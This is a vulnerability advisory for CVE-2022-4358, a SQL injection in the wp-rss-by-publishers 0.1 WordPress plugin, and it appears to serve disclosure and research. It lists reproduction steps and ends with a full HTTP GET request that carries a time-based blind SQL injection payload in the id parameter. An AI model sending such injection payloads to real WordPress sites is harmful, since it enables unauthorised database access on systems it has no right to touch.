wp-rss-by-publishers (3/3) WordPress plugin SQL injection

Vulnerability Metadata


Key Value
Date of Disclosure December 09 2022
Affected Software wp-rss-by-publishers
Affected Software Type WordPress plugin
Version 0.1
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-4358
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Daniel Krohmer, Kunal Sharma
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/wp-rss-by-publishers
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-4358

Vulnerability Description


The wsysadmin_rules page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

Exploitation Guide


This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);

CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);

CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);

Login as admin user. This attack requires at least admin privileges.

wp-rss-by-publishers_0-1_3_step-0.PNG

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

wp-rss-by-publishers_0-1_3_step-1.PNG

Hover over the name of the publisher that has been created and select Edit.

wp-rss-by-publishers_0-1_3_step-2.PNG

Clicking the previous button triggers the following request:

wp-rss-by-publishers_0-1_3_step-3.PNG

However, for the vulnerable request, some modifications are necessary: The wsysadmin_publishers page needs to be changed to wsysadmin_rules. Then, id is the vulnerable query parameter:

wp-rss-by-publishers_0-1_3_step-4.PNG

An exploit may look like the following:

wp-rss-by-publishers_0-1_3_step-5.PNG

In the code, the update_feeds function handles different page inputs, in this case wsysadmin_rules at line 905 in ./wp-rss-by-publisher.php.

wp-rss-by-publishers_0-1_3_step-6.PNG

In case the action is set to delete and id holds a value, the WSYS_Feed::delete method is called, again passing the vulnerable id parameter at line 962 in ./wp-rss-by-publisher.php.

wp-rss-by-publishers_0-1_3_step-7.PNG

The final database query is called at line 76 in ./classes/wsys-db.class.php.

wp-rss-by-publishers_0-1_3_step-8.PNG

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below.

GET /wp-admin/admin.php?page=wsysadmin_rules&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1